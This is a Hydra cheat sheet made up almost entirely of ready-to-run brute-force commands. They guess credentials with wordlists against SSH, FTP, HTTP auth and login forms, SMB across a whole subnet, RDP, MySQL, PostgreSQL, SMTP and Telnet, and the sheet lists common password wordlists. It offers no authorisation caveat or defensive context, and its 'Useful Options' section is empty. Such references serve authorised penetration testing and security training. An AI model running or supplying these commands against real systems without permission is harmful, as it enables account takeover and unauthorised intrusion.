Hydra Cheat Sheet

Basic Syntax

hydra -l user -p pass protocol://target
hydra -L users.txt -P passwords.txt protocol://target

# -l  single username
# -L  username wordlist
# -p  single password
# -P  password wordlist
# -t  threads (default 16)
# -vV verbose, show each attempt
# -f  stop on first valid credential
# -o  output to file

Protocols

SSH

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
hydra -l root -P passwords.txt ssh://192.168.1.1 -t 4
hydra -l root -P passwords.txt 192.168.1.1 ssh -t 4

FTP

hydra -l admin -P passwords.txt ftp://192.168.1.1
hydra -L users.txt -P passwords.txt ftp://192.168.1.1 -t 10

HTTP Basic Auth

hydra -l admin -P passwords.txt http-get://192.168.1.1/admin
hydra -l admin -P passwords.txt https-get://192.168.1.1/admin

HTTP POST Form

# Syntax: "path:POST_params:failure_string"
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

# With cookie
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:error:H=Cookie: session=abc123"

SMB

hydra -l Administrator -P passwords.txt smb://192.168.1.1
hydra -L users.txt -P passwords.txt 192.168.1.0/24 smb

RDP

hydra -l Administrator -P passwords.txt rdp://192.168.1.1

MySQL

hydra -l root -P passwords.txt mysql://192.168.1.1

PostgreSQL

hydra -l postgres -P passwords.txt postgres://192.168.1.1

SMTP

hydra -l [email protected] -P passwords.txt smtp://mail.domain.com
hydra -l user -P passwords.txt smtp://192.168.1.1:587

Telnet

hydra -l admin -P passwords.txt telnet://192.168.1.1

Useful Options

Common Wordlists

/usr/share/wordlists/rockyou.txt         # Large, classic
/usr/share/wordlists/dirb/common.txt     # Short/common
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
/usr/share/seclists/Usernames/Names/names.txt